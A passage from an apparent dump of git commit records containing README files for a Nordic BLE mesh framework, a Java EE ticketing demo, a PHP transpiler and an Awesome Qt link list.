SIG\nnamespace descriptors], where the enumeration of each value is used as\na mesh-global handle.\n\n_NOTE:_ Because the Bluetooth SIG has defined namespace descriptor 0 as\n\"unknown\", the handles start at 1, and trying to access handle 0 returns an\nNRF_ERROR_INVALID_ADDR error.\n\n==== Mesh metadata\nFor ease of use, the service also provides a Metadata characteristic, providing\nconfiguration parameters for the mesh. This meatadata characteristic may be\nread by external nodes, and used for configuring new nodes that the user wishes\nto add to the mesh. The Metadata characteristic is structured as follows:\n\n[cols=\"3,1,1,6\", options=\"Header\"]\n.Metadata Characteristic Structure\n|===\n|Value | Position | Size | Description\n\n|Access Address | 0 | 4 bytes | The Access address the mesh operates on. \n|Advertisement interval | 4 | 4 bytes | The minimum advertisement interval each value\nis broadcasted with in milliseconds.\n|Value count | 8 | 1 byte | The amount of available value slots on the node\n|Channel | 9 | 1 byte | The BLE channel the mesh operates on\n|===\n\n\n\n=== Trickle Algorithm\nThe Trickle Algorithm was first presented by P. Levis of Stanford University\nand T. Clausen of LIX, Ecole Polytechnique in March 2010, and has since seen\nseveral revisions until it was published as RFC6202 in March 2011. The Trickle\nAlgorithm provides a method of controlled packet flooding across a mesh of\nlow-power lossy network nodes, by letting the nodes dynamically decide when to\nbroadcast their values based on network activity and when the last update to\nstate values arrived. \n\n==== A brief overview\nThe algorithm operate in exponentially growing time intervals of size I, starting at\ninterval size Imin, growing up to Imax. During an interval, it registers all\nincoming messages, where each message may be either consistent or inconsistent\nwith the nodes current state (the definition of consistency is left for the \nuser to decide). For each consistent message, a counter value, C is increased\nby one, and for each inconsistent message, if the interval size I is larger\nthan Imin, the interval timer is reset, and I is set to Imin. At the start of\neach interval, a timer T is set for a random time in the range `[I\/2, I)`. When\nthis timer expires, the node shall broadcast its state if the consistent\nmessage counter C is less than some redundancy constant K. At the end of each\ninterval, the interval length (I) is doubled if `I * 2 < Imax`, and C is reset.\n\nThe exponential growth and insconsistency reset functionality allows the nodes\nin the network to grow exponentially more silent as the state remains\nunchanged, but still stays responsive, as new information arrives. The\nconsistency counter C and redundancy constant K allows the system to\ndynamically adjust to network density, as nodes will choose not to transmit if\nthey've heard the same message from other nodes several times.\n\n==== Usage in the framework\nThe framework provides one instance of the Trickle Algorithm for each handle\nvalue pair (dubbed a Trickle instance). This means that when one value is frequently updated, while another\none remains unchanged, the node only rebroadcasts the active value frequently,\nkeeping the interval times for the static value high. Each handle-value pair\nalso comes with a version number, which increases by one for each fresh write\nto a value. This version number, along with a checksum allows the framework to\ndistinguish value consistency. If the node recevies a value update with a\nhigher version number than its own, it will automatically overwrite the\ncontents of the value data and notify the user. Any inconsistencies to both\nversion number and checksum results in a reset of interval timing for the value\nin question. \n\n==== Weaknesses in algorithm and implementation\nWhile the algorithm in its intended form provides a rather robust and\neffective packet propagation scheme, some necessary adjustments introduces a\nfew weaknesses. First off, using several instances of the algorithm on the same\nset of nodes yields a growth in on-air collisions and poorer frequency\nutilization control, as the individual instances take no consideration to\nthe others' activity. This means that the scheme doesn't scale that well with\nseveral handle value pairs, and the user is asked to consider this during\nimplementation. The choice of doing separate trickle instances is, however a\nresult of a tradeoff: If the entire node state shared one trickle instance, the\nentire state would be rebroadcasted each time a part of it is updated, \nand the amount of shareable data would be severely limited by packet size and\npacket chaining possibilities.\n\nAnother weakness in the adaption is caused by the fact that the Softdevice Timeslot API\nwon't let the framework get free access to the radio at all times, resulting in\na reduced on-air time for mesh related operations. When the\nSoftdevice operates in an advertising state, this problem only has an impact of\n5-25% reduction in potential on-air time for mesh operations, but in a\nconnected state with a short connection interval, the Softdevice may reduce\ntimeslots by as much as 80%. This results in a lot of missed packets to the\naffected node, and may dramatically increase propagation time to this\nnode. \n\n=== Timeslots\nThe framework does all mesh-related transmissions in timeslots granted by the\nSoftdevice Multiprotocol Timeslot API, operating directly on the radio hardware\nmodule. Timeslots are primarily allocated by extending, short timeslots into\ntimeslots of upto 1 second, and the framework will attempt to seize the radio \nfor as much as the Softdevice will allow. At the beginning of each timeslot, \nthe framework samples the RTC0 Low Frequency Timer, and checks whether any \ntimers related to the Trickle Algorithm have expired since the end of the \nprevious timeslot. If this is the case, the framework does all pending \noperations immediately. After this initial \"catch up\" operation, the framework \nhandles all operations as they appear for the remainder of the timeslot.\n\nFor details about the Softdevice Multiprotocol Timeslot API, plese refer to the\nSoftdevice Specification, available on the Nordic Semiconductor homepage.\n\n=== Air interface packets\nAll Mesh-related packets are broadcasted as regular BLE Nonconnectable\nAdvertisements, with a few differences: The Access address is set by the user,\nand does not have to match the Bluetooth Specification advertisement access\naddress. In addition, the Advertisement Address (GAP address) field provided after\nthe packet header, does not necessarily contain the Advertisement Address of\nthe node broadcasting the message, but rather the address of the mesh node at\nwhich the indicated version of the value-handle pair first appeared. The\npacket structure is illustrated below.\n\nimage::docs\/packet_format.png[Packet format on air]\n\n=== Resource allocation\nThe framework takes control over several hardware and software resources,\nmaking these unavailable to applications:\n\n* *Timeslot API* All callbacks for timeslot sessions are held by the framework,\n\n* *SWI0_IRQ* The Software interrupt is used for asynchronous packet processing \n\n* *NRF_TIMER0* HF timer 0 is reset and started by the Timeslot API at the\nbeginning of each timeslot, and all capture compare slots for this timer may be\nin use at any time\n\n* *NRF_RTC0* The Timeslot API uses RTC0 for timing, and manipulating this\nmodule will lead to undefined behavior or hardfaults in the Softdevice.\n\n* *NRF_PPI, channels 8-12* The framework uses PPI channel 8-12 for radio\noperation during timeslots, and the Softdevice may use channels 8+ outside them. Only\nchannels 0-7 are safely available to the application (just as with regular\n Softdevice applications).\n\nIn addition, the Softdevice may block some hardware blocks not listed here.\nPlease refer to the relevant Softdevice Specification for details (available at\nthe Nordic Semiconductor homepage).\n\n==== Memory\nThe framework allocates a metadata array on the heap, with 36bytes per\nhandle-value pair. The rest of the program operates strictly on the stack, and\ncompiled at Optimization level -O0, Keil reports a program size of approx.\n10kB, and stack size of 5.5kB for the Template project under `examples\/`.\n\n== Why this was made\nThis project is created in collaboration with The Norwegian University of \nScience and Technology (NTNU), as part of a master thesis pre-study. \n\n== Forum\nhttp:\/\/devzone.nordicsemi.com\/[Nordic Developer Zone]\n\n== Resources\nhttp:\/\/www.nordicsemi.com[Nordic Semiconductor Homepage] \n\nhttp:\/\/tools.ietf.org\/html\/rfc6206[Trickle Algorithm Specification]\n\n\n","returncode":0,"stderr":"","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"d80882467ab625c5cabc391ca17d1e25c6532ceb","subject":"Better","message":"Better\n","repos":"LearningTree\/TicketManorJava,LearningTree\/TicketManorJava,LearningTree\/TicketManorJava,LearningTree\/TicketManorJava","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= TicketManor\n\nThis is a demo application of building enterprise applications using Java EE. There are \na variety of APIs used, e.g., Java EE (JPA, EJB), Spring Framework, modern SPA Web (Angular, Ember.JS),\nand so on. Each major framework has its own subdirectory.\n\nIt will be used as a showcase in various courses offered by http:\/\/learningtree.com\/[Learning Tree],\nthe world leader in instructor-led tecnical training. Learning Tree offers courses in Java\nas well as many other enterprise applications.\n\nLegal Note: We do _not_ intend this to be a passing-off of TicketMaster.com, which is a trademark in\nmost countries. It is just a demonstration of how certain parts of an enterprise app could\nbe implemented. WE ARE NOT ACTUALLY SELLING ANY TICKETS.\n\nThis site is *not* affiliated in any way with http:\/\/ticketmaster.com\/[TicketMaster(TM)] nor any\nother commercial ticket selling organization.\n\n== Building\n\nThe Java projects generally use Eclipse to write\/compile\/test code and Maven to build\/package.\nThe Android project uses Android Studio (based on IntelliJ IDea) to write code\nand Gradle to compile\/test\/package.\n\nThe top-level Maven pom runs each of the other projects (including android, through\na Maven plug-in that knows how to run Gradle).\n\n.*Build*\nimage:http:\/\/img.shields.io\/badge\/license-BSD2-green.svg[link=\"http:\/\/github.com\/LearningTree\/TicketManorJava\"]\nimage:https:\/\/img.shields.io\/badge\/maven-Built With-pink.svg[link=\"http:\/\/search.maven.org\/#search%7Cga%7C1%7Ca%3A%22darwinsys-api%22\"]\n\n== Deployment\n\nThe server projects are configured to deploy with the EE Server WildFly 8+\n\nYou MUST change the file ${WILDFLYHOME}\/standalone\/configuration\/standalone.xml AND standalone-full.xml to have\na datasource named TicketManorDataSource. For initial testing I just added:\n\n\t<datasource jndi-name=\"java:jboss\/datasources\/TicketManorDataSource\" pool-name=\"TicketManorPool\" \n\t\tenabled=\"true\" use-java-context=\"true\">\n\t\t<connection-url>jdbc:h2:mem:ticketmanor;DB_CLOSE_DELAY=-1;DB_CLOSE_ON_EXIT=FALSE<\/connection-url>\n\t\t<driver>h2<\/driver>\n\t\t<security>\n\t\t\t<user-name>sa<\/user-name>\n\t\t\t<password>sa<\/password>\n\t\t<\/security>\n\t<\/datasource>\n\nWe should someday change this to MySQL or a real database before deployment.\n\nN.B. Never give the production app unfettered access to the database;\nlimit it by doing something like this (commands are from PostgreSQL but\nwill be similar on other DB products):\n\n----\nwebsite=# create role myAppAcct login password 'siuojk21jsr';\nCREATE ROLE\nwebsite=# grant select,insert on someTable to myAppAcct;\nGRANT\nwebsite=# \n----\n\nYou might need a few other perms if JPA\/Hibernate is running in \"create\" or \"update\" mode,\nbut these modes should not really be used in production!\n\n== Naming Conventions\n\nIn the Java code:\n\n* *Bean means either a JSF managed JavaBean or a Spring-managed JavaBean;\n* *Resource means a RESTful web service endpoint;\n* *Ejb (or *EJB) of course represents an Enterprise JavaBean.\n\n== ToDos\n\n=== Basics\n\nUse http:\/\/www.stateofflow.com\/journal\/66\/creating-java-projects-programmatically to create Eclipse\nprojects for different courses.\n\n=== Beyond The Basics\n\nThe following is IN ADDITION to getting\nthe basic functionality working across all the designated APIs\nthat we need to demonstrate in the courses. It's more a placeholder\nfor IDEAS than an actual list of steps to do.\n\n* Digest an RSS feed of new movies, concerts, acts, and load into the database.\n* \"Sync Instance\" feature to update the database from a master copy on the Internet.\n\n=== Cross-Platformality\n\nMaybe use https:\/\/github.com\/google\/j2objc\/[j2objc] to make iOS versions of at least the Model classes.\n","old_contents":"= TicketManor\n\nThis is a demo application of building enterprise applications using Java EE. There are \na variety of APIs used, e.g., Java EE (JPA, EJB), Spring Framework, modern SPA Web (Angular, Ember.JS),\nand so on. Each major framework has its own subdirectory.\n\nIt will be used as a showcase in various courses offered by http:\/\/learningtree.com\/[Learning Tree],\nthe world leader in instructor-led tecnical training. Learning Tree offers courses in Java\nas well as many other enterprise applications.\n\nLegal Note: We do _not_ intend this to be a passing-off of TicketMaster.com, which is a trademark in\nmost countries. It is just a demonstration of how certain parts of an enterprise app could\nbe implemented. WE ARE NOT ACTUALLY SELLING ANY TICKETS.\n\nThis site is *not* affiliated in any way with http:\/\/ticketmaster.com\/[TicketMaster(TM)] nor any\nother commercial ticket selling organization.\n\n== Building\n\nThe Java projects generally use Eclipse to write\/compile\/test code and Maven to build\/package.\nThe Android project uses Android Studio (based on IntelliJ IDea) to write code\nand Gradle to compile\/test\/package.\n\nThe top-level Maven pom runs each of the other projects (including android, through\na Maven plug-in that knows how to run Gradle).\n\n.*Build*\nimage:http:\/\/img.shields.io\/badge\/license-BSD2-green.svg[link=\"http:\/\/github.com\/LearningTree\/TicketManorJava\"]\nimage:https:\/\/img.shields.io\/maven-central\/v\/org.apache.maven\/apache-maven.svg\"[link=\"http:\/\/search.maven.org\/#search%7Cga%7C1%7Ca%3A%22darwinsys-api%22\"]\n\n== Deployment\n\nThe server projects are configured to deploy with the EE Server WildFly 8+\n\nYou MUST change the file ${WILDFLYHOME}\/standalone\/configuration\/standalone.xml AND standalone-full.xml to have\na datasource named TicketManorDataSource. For initial testing I just added:\n\n\t<datasource jndi-name=\"java:jboss\/datasources\/TicketManorDataSource\" pool-name=\"TicketManorPool\" \n\t\tenabled=\"true\" use-java-context=\"true\">\n\t\t<connection-url>jdbc:h2:mem:ticketmanor;DB_CLOSE_DELAY=-1;DB_CLOSE_ON_EXIT=FALSE<\/connection-url>\n\t\t<driver>h2<\/driver>\n\t\t<security>\n\t\t\t<user-name>sa<\/user-name>\n\t\t\t<password>sa<\/password>\n\t\t<\/security>\n\t<\/datasource>\n\nWe should someday change this to MySQL or a real database before deployment.\n\nN.B. Never give the production app unfettered access to the database;\nlimit it by doing something like this (commands are from PostgreSQL but\nwill be similar on other DB products):\n\n----\nwebsite=# create role myAppAcct login password 'siuojk21jsr';\nCREATE ROLE\nwebsite=# grant select,insert on someTable to myAppAcct;\nGRANT\nwebsite=# \n----\n\nYou might need a few other perms if JPA\/Hibernate is running in \"create\" or \"update\" mode,\nbut these modes should not really be used in production!\n\n== Naming Conventions\n\nIn the Java code:\n\n* *Bean means either a JSF managed JavaBean or a Spring-managed JavaBean;\n* *Resource means a RESTful web service endpoint;\n* *Ejb (or *EJB) of course represents an Enterprise JavaBean.\n\n== ToDos\n\n=== Basics\n\nUse http:\/\/www.stateofflow.com\/journal\/66\/creating-java-projects-programmatically to create Eclipse\nprojects for different courses.\n\n=== Beyond The Basics\n\nThe following is IN ADDITION to getting\nthe basic functionality working across all the designated APIs\nthat we need to demonstrate in the courses. It's more a placeholder\nfor IDEAS than an actual list of steps to do.\n\n* Digest an RSS feed of new movies, concerts, acts, and load into the database.\n* \"Sync Instance\" feature to update the database from a master copy on the Internet.\n\n=== Cross-Platformality\n\nMaybe use https:\/\/github.com\/google\/j2objc\/[j2objc] to make iOS versions of at least the Model classes.\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"39ec70eda2a342c8910e814e966e44f7301ce89d","subject":"add logo to readme","message":"add logo to readme\n","repos":"Mikulas\/transpiler,Mikulas\/transpiler","old_file":"README.adoc","new_file":"README.adoc","new_contents":":toc: macro\n:!toc-title:\n:source-language: php\n\n++++\n<img height=\"150\" src=\"https:\/\/mikulas.github.io\/assets\/transpiler.svg\" align=\"right\" \/>\n++++\n= Transpiler\n\nPHP source code transformations.\n\nimage:https:\/\/circleci.com\/gh\/Mikulas\/transpiler.svg?style=svg&circle-token=95af859daa8a8d404100caf22e52269e447012f3[\"CircleCI\", link=\"https:\/\/circleci.com\/gh\/Mikulas\/transpiler\"]\n\ntoc::[]\n\n== What Is It Good For?\n\nBy transpiling code to older runtime versions you gain\nmany benefits of PHP 7.1 such as void return types and\noptionals (which are mostly useful for static analysis),\nbut you are not forced to update production to unstable\nbleeding-edge versions.\n\n== Implemented AST modifiers:\n\n=== PHP 7.1 -> 7.0\n\nhttp:\/\/php.net\/manual\/en\/migration71.new-features.php\n\n==== Remove void return types\n\n```\nfunction foo(): void\n{\n}\n\n# -->\n\nfunction foo()\n{\n}\n```\n\n__Limitations:__ `ReflectionFunctionAbstract::getReturnType()` and `hasReturnType()` will return `NULL` and `FALSE` respectively instead of original values.\n\n==== Remove class constant visibilities\n\n```\nclass Foo\n{\n public const A = 'a';\n protected const B = 'b';\n private const C = 'c';\n}\n\n# -->\n\nclass Foo\n{\n const A = 'a';\n const B = 'b';\n const C = 'c';\n}\n```\n\n__Limitations:__ none\n\n==== Rollout named assignment\n\n```\n['X' => ['A' => $a, 'B' => $b]] = ['X' => ['A' => 10, 'B' => 20]];\nlist('T' => list('U' => $u, 'V' => $v)) = ['T' => ['U' => 15, 'V' => 19]];\n\nwhile (list($a, $b) = $right) {\n block();\n}\n# -->\n\n${'~transpiler-1'} = ['X' => ['A' => 10, 'B' => 20]];\n$a = ${'~transpiler-1'}['X']['A'];\n$b = ${'~transpiler-1'}['X']['B'];\n\n${'~transpiler-2'} = ['T' => ['U' => 15, 'V' => 19]];\n$u = ${'~transpiler-2'}['T']['U'];\n$v = ${'~transpiler-2'}['T']['V'];\n\nwhile (${'~transpiler-3'} = $right) {\n $a = ${'~transpiler-3'}[0];\n $b = ${'~transpiler-3'}[1];\n block();\n}\n```\n\n__Limitations:__ slightly worse performance, introduces new variable\n\nDynamic mutating keys are not supported.\n```\n[$x++ => $a, $x++ => $b] = [10, 20];\n```\n\n=== Remove nullable return type\n\n```\nfunction sum(): ?int\n{\n}\n\n# -->\n\nfunction sum()\n{\n}\n```\n\n=== Convert nullable parameter\n\n```\nfunction sum(?int $a, ?int $b)\n{\n}\n\n# -->\n\nfunction sum(int $a = NULL, int $b = NULL)\n{\n}\n```\n\n=== Remove iterable type\n\n```\nfunction compute(iterable $arr): iterable\n{\n}\n\n# -->\n\nfunction compute($arr)\n{\n}\n```\n\n\n=== Convert `Closure::fromCallable`\n\n```\nClosure::fromCallable('intdiv');\nClosure::fromCallable([$foo, 'bar']);\nClosure::fromCallable([Foo::class, 'qaz']);\nClosure::fromCallable($foo($a = $b));\n\n# -->\n\nfunction () {\n return call_user_func_array('intdiv', func_get_args());\n};\n\nfunction () use(&$foo) {\n return call_user_func_array([$foo, 'bar'], func_get_args());\n};\n\nfunction () {\n return call_user_func_array([Foo::class, 'qaz'], func_get_args());\n};\n\nfunction () use(&$foo, &$a, &$b) {\n return call_user_func_array($foo($a = $b), func_get_args());\n};\n```\n\n__Limitations:__ FQN is not resolved, so aliases to Closure do not work. Dynamic invocation does not work either (such as from `call_user_func`).\n\n\n=== Expand multi catch exception handlers\n\n```\ntry {\n} catch (FooException | BarException $e) {\n handler();\n}\n\n# -->\n\ntry {\n} catch (FooException $e) {\n handler();\n} catch (BarException $e) {\n handler();\n}\n```\n","old_contents":"= Transpiler\n:toc: macro\n:!toc-title:\n:source-language: php\n\nPHP source code transformations.\n\nimage:https:\/\/circleci.com\/gh\/Mikulas\/transpiler.svg?style=svg&circle-token=95af859daa8a8d404100caf22e52269e447012f3[\"CircleCI\", link=\"https:\/\/circleci.com\/gh\/Mikulas\/transpiler\"]\n\ntoc::[]\n\n== What Is It Good For?\n\nBy transpiling code to older runtime versions you gain\nmany benefits of PHP 7.1 such as void return types and\noptionals (which are mostly useful for static analysis),\nbut you are not forced to update production to unstable\nbleeding-edge versions.\n\n== Implemented AST modifiers:\n\n=== PHP 7.1 -> 7.0\n\nhttp:\/\/php.net\/manual\/en\/migration71.new-features.php\n\n==== Remove void return types\n\n```\nfunction foo(): void\n{\n}\n\n# -->\n\nfunction foo()\n{\n}\n```\n\n__Limitations:__ `ReflectionFunctionAbstract::getReturnType()` and `hasReturnType()` will return `NULL` and `FALSE` respectively instead of original values.\n\n==== Remove class constant visibilities\n\n```\nclass Foo\n{\n public const A = 'a';\n protected const B = 'b';\n private const C = 'c';\n}\n\n# -->\n\nclass Foo\n{\n const A = 'a';\n const B = 'b';\n const C = 'c';\n}\n```\n\n__Limitations:__ none\n\n==== Rollout named assignment\n\n```\n['X' => ['A' => $a, 'B' => $b]] = ['X' => ['A' => 10, 'B' => 20]];\nlist('T' => list('U' => $u, 'V' => $v)) = ['T' => ['U' => 15, 'V' => 19]];\n\nwhile (list($a, $b) = $right) {\n block();\n}\n# -->\n\n${'~transpiler-1'} = ['X' => ['A' => 10, 'B' => 20]];\n$a = ${'~transpiler-1'}['X']['A'];\n$b = ${'~transpiler-1'}['X']['B'];\n\n${'~transpiler-2'} = ['T' => ['U' => 15, 'V' => 19]];\n$u = ${'~transpiler-2'}['T']['U'];\n$v = ${'~transpiler-2'}['T']['V'];\n\nwhile (${'~transpiler-3'} = $right) {\n $a = ${'~transpiler-3'}[0];\n $b = ${'~transpiler-3'}[1];\n block();\n}\n```\n\n__Limitations:__ slightly worse performance, introduces new variable\n\nDynamic mutating keys are not supported.\n```\n[$x++ => $a, $x++ => $b] = [10, 20];\n```\n\n=== Remove nullable return type\n\n```\nfunction sum(): ?int\n{\n}\n\n# -->\n\nfunction sum()\n{\n}\n```\n\n=== Convert nullable parameter\n\n```\nfunction sum(?int $a, ?int $b)\n{\n}\n\n# -->\n\nfunction sum(int $a = NULL, int $b = NULL)\n{\n}\n```\n\n=== Remove iterable type\n\n```\nfunction compute(iterable $arr): iterable\n{\n}\n\n# -->\n\nfunction compute($arr)\n{\n}\n```\n\n\n=== Convert `Closure::fromCallable`\n\n```\nClosure::fromCallable('intdiv');\nClosure::fromCallable([$foo, 'bar']);\nClosure::fromCallable([Foo::class, 'qaz']);\nClosure::fromCallable($foo($a = $b));\n\n# -->\n\nfunction () {\n return call_user_func_array('intdiv', func_get_args());\n};\n\nfunction () use(&$foo) {\n return call_user_func_array([$foo, 'bar'], func_get_args());\n};\n\nfunction () {\n return call_user_func_array([Foo::class, 'qaz'], func_get_args());\n};\n\nfunction () use(&$foo, &$a, &$b) {\n return call_user_func_array($foo($a = $b), func_get_args());\n};\n```\n\n__Limitations:__ FQN is not resolved, so aliases to Closure do not work. Dynamic invocation does not work either (such as from `call_user_func`).\n\n\n=== Expand multi catch exception handlers\n\n```\ntry {\n} catch (FooException | BarException $e) {\n handler();\n}\n\n# -->\n\ntry {\n} catch (FooException $e) {\n handler();\n} catch (BarException $e) {\n handler();\n}\n```\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"bcf11f7da0280b00eef5693364931889d321dce1","subject":"Add main section about other registries","message":"Add main section about other registries\n","repos":"insideqt\/awesome-qt","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Awesome Qt\n:icons: font\n:toc: preamble\n:toc-title:\n\n:MIT: http:\/\/opensource.org\/licenses\/MIT[MIT license.]\n\nA curated list of links to awesome Qt-related libraries, tools, and other\nresources published under Free Software\/Open Source licenses.\n\nDon't forget to check http:\/\/doc.qt.io\/qt-5\/qtmodules.html[the list of essential\nand add-on modules from the Qt project] first! Upcoming modules might be in\n`qt-labs` or `playground` in http:\/\/code.qt.io\/[code.qt.io]. And remember that\nthere is https:\/\/github.com\/fffaraz\/awesome-cpp[Awesome C\/C++] for more projects\nthat don't use Qt.\n\n\n\n== Other registries \/ package managers\n\nThere are other projects that aim to provide not only an entry point to find\nother Qt libraries, but also a tool to download and configure them.\n\nhttp:\/\/inqlude.org\/::\nA large list of Qt libraries, categorized by maturity level and license. Is the\noldest and largest archive of Qt projects. A project from the\nhttp:\/\/www.kde.org[KDE] community.\n\nhttps:\/\/www.qpm.io\/::\nA package manager for Qt, from the http:\/\/www.cutehacks.com\/[Cutehacks]\ndevelopers. Is the youngest project, but features the best command line tool to\ninstall packages.\n\nhttp:\/\/www.qt-pods.org\/::\nInspired by the Cocoa pods project, a package manager with even a GUI interface\nbased on git submodules.\n\n\n\n== Libraries\n\n\n=== Databases\n\nhttps:\/\/github.com\/KDAB\/sqlate::\nCompile-time checked type-safe access to SQL databases using C++ templates.\nAllows you to get rid of string-based SQL queries in your Qt application.\n\n\n=== Event loop dispatchers\n\nhttps:\/\/github.com\/sjinks\/qt_eventdispatcher_epoll::\nepoll-based event dispatcher\n\nhttps:\/\/github.com\/connectedtable\/qeventdispatcher_epoll::\nepoll event dispatcher\n\nhttps:\/\/github.com\/sjinks\/qt_eventdispatcher_libevent::\nlibevent-based event dispatcher\n\nhttps:\/\/github.com\/sjinks\/qt_eventdispatcher_libev::\nlibev-based event dispatcher\n\nhttps:\/\/github.com\/svalaskevicius\/qt-event-dispatcher-libuv::\nlibuv event dispatcher\n\n\n=== File formats\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/karchive\/html\/::\nProvides classes for easy reading, creation and manipulation of \"archive\"\nformats like ZIP and TAR. It also provides transparent compression and\ndecompression of data, like the GZip format, via a subclass of QIODevice.\n\nhttps:\/\/github.com\/flavio\/qjson::\nLibrary that maps JSON data to QVariant objects. Supports Qt 4.\n\nhttps:\/\/github.com\/gaudecker\/qt-json::\nA simple class for parsing JSON data into a QVariant hierarchy and vice versa.\nSupports Qt 4.\n\n\n=== Gaming\n\nhttps:\/\/github.com\/Bacon2D\/Bacon2D::\nFramework to ease 2D game development, providing ready-to-use QML elements\nrepresenting basic game entities needed by most of games. Starting with the\ntop-level Game container, which provides a game loop and Scene management, all\nthe way down to entities with Box2D physics and parallax layers with infinite\nscrolling.\n\nhttps:\/\/github.com\/qml-box2d\/qml-box2d::\nBox2D plugin for QML. The goal is to expose the functionality of Box2D as QML\ncomponents, in order to make it easy to write physics based games in QML.\n\nhttp:\/\/v-play.net\/::\nAllows easy cross-platform mobile game development for all major platforms\nincluding iOS, Android, BlackBerry.\n\n\n=== Graphics\n\nhttp:\/\/www.kdab.com\/kd-reports\/::\nLets you easily create printable reports by providing all of the necessary\nfeatures for a variety of applications. Reports can be created programmatically,\nusing an easy to use C++ API, or they can be data-driven, creating reports from\nXML or SQL data sources complete with watermarks, headers and footers. Reports\ncan be previewed manually, sent directly to a printer, or saved as PDF files.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kimageformats\/html\/::\nProvides additional image format plugins for QtGui. Read support for: Gimp\n(xcf), OpenEXR (exr), Photoshop documents (psd), Sun Raster (ras). Write support\nfor: Encapsulated PostScript (eps), Personal Computer Exchange (pcx), SGI images\n(rgb, rgba, sgi, bw), Softimage PIC (pic), Targa (tga), XView (xv).\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kplotting\/html\/::\nA lightweight and easy to use plot widget.\n\/\/ TODO: Original description was pretty bad. I think this is the best I can say\n\/\/ right now, but help improving this is more than welcome.\n\nhttps:\/\/github.com\/gamecreature\/QtAwesome::\nLibrary for using http:\/\/fortawesome.github.io\/Font-Awesome\/[Font Awesome] or\nother icon sets based on font files.\n\nhttp:\/\/qwt.sourceforge.net\/::\nQt Widgets for Technical Applications. Contains GUI Components and utility\nclasses which are primarily useful for programs with a technical background.\nBeside a framework for 2D plots it provides scales, sliders, dials, compasses,\nthermometers, wheels and knobs to control or display values, arrays, or ranges\nof type double.\n\n\n=== Hardware detection and interaction\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/bluez-qt\/html\/::\nBluezQt is a library for communication with the BlueZ system and session\ndaemons.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/solid\/html\/::\nA device integration framework. It provides a way of querying and\ninteracting with hardware independently of the underlying operating system.\nIt provides the following features for application developers: Hardware\nDiscovery, Power Management, and Network Management.\n\n\n=== Inter process communication\n\n\n=== Multimedia\n\nhttp:\/\/www.qtav.org\/::\nQtAV is a multimedia playback library based on Qt and FFmpeg. Supports Android,\niOS and desktops.\n\nhttps:\/\/vlc-qt.tano.si\/::\nContains core classes for main media playback and some GUI classes for faster\nmedia player developement.\n\n=== Network protocols and web services\n\nhttp:\/\/communi.github.io\/::\nA cross-platform IRC framework. Provides a set of tools for enabling IRC\nconnectivity in Qt-based C++ and QML applications.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kdnssd\/html\/::\nLibrary for handling the DNS-based Service Discovery Protocol (DNS-SD), the\nlayer of Zeroconf that allows network services, such as printers, to be\ndiscovered without any user intervention or centralized infrastructure.\n\nhttps:\/\/github.com\/wiedi\/libmaia::\nXML-RPC library.\n\n\n=== Other programming languages\n\nhttps:\/\/github.com\/seanchas116\/libqmlbind::\nA C library for easily creating QML bindings for other languages by exporting\nobjects to QML. In use in `ruby-qml`.\n\nhttp:\/\/www.riverbankcomputing.com\/software\/pyqt\/::\nA set of Python 2 and Python 3 bindings for Qt and runs on all platforms\nsupported by Qt including Windows, OS X and Linux. PyQt5 supports Qt 5.\n\nhttp:\/\/thp.io\/2011\/pyotherside\/::\nAsynchronous Python 3 Bindings for Qt 5. This is a QML Plugin that provides\naccess to a Python 3 interpreter from QML.\n\nhttps:\/\/wiki.qt.io\/Category:LanguageBindings::PySide::\nProvides LGPL-licensed Python bindings for Qt. It also includes a complete\ntoolchain for rapidly generating bindings for any Qt-based C++ class\nhierarchy.\n\nhttp:\/\/seanchas116.github.io\/ruby-qml\/::\nBindings between Ruby and QML. Enables you to write Qt Quick GUIs in Ruby.\n\nhttps:\/\/github.com\/trollixx\/node.qml::\nNode.js compatibility layer to QML applications. Potentially, QML applications\nshould be able to use majority of Node.js libraries.\n\n\n=== Threading and asynchronous programming\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/threadweaver\/html\/::\nHelper for multithreaded programming. It uses a job-based interface to queue\ntasks and execute them in an efficient way. You simply divide the workload into\njobs, state the dependencies between the jobs and ThreadWeaver will work out the\nmost efficient way of dividing the work between threads within a set of resource\nlimits.\n\n\n=== User Interface\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kguiaddons\/html\/::\nUtilities for graphical user interfaces in the areas of colors, fonts, text,\nimages, keyboard input.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kitemmodels\/html\/::\nA set of extra item models for the model-view framework.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kitemviews\/html\/::\nIncludes a set of views, which can be used with item models. It includes views\nfor categorizing lists and to add search filters to flat and hierarchical lists.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kwidgetsaddons\/html\/::\nAction classes that can be added to toolbars or menus, a wide range of widgets\nfor selecting characters, fonts, colors, actions, dates and times, or MIME\ntypes, as well as platform-aware dialogs for configuration pages, message boxes,\nand password requests.\n\nhttps:\/\/github.com\/mikemcquaid\/Qocoa::\nWrappers for OS X Cocoa widgets. {MIT}\n\nhttps:\/\/github.com\/shadone\/qtmacgoodies::\nAdditional widgets\/objects to make applications look more native on Mac OS X,\nlike `MacPreferencesWindow`, `MacStandardIcon` or `MacWindow`.\n\nhttps:\/\/github.com\/cybercatalyst\/qtsystemtrayiconmac::\nExtended QSystemTrayIcon for Mac OS X.\n\n\n=== Web frameworks\n\nhttp:\/\/cutelyst.org\/::\nMVC web framework inspired in Perl's Catalyst.\n\nhttps:\/\/github.com\/jlaine\/qdjango\/::\nQDjango is a web framework written in C++ and built on top of the Qt library.\nWhere possible it tries to follow django's API, hence its name.\n\nhttp:\/\/www.treefrogframework.org\/::\nHigh-speed and full-stack web application framework based on C++ and Qt, which\nsupports HTTP and 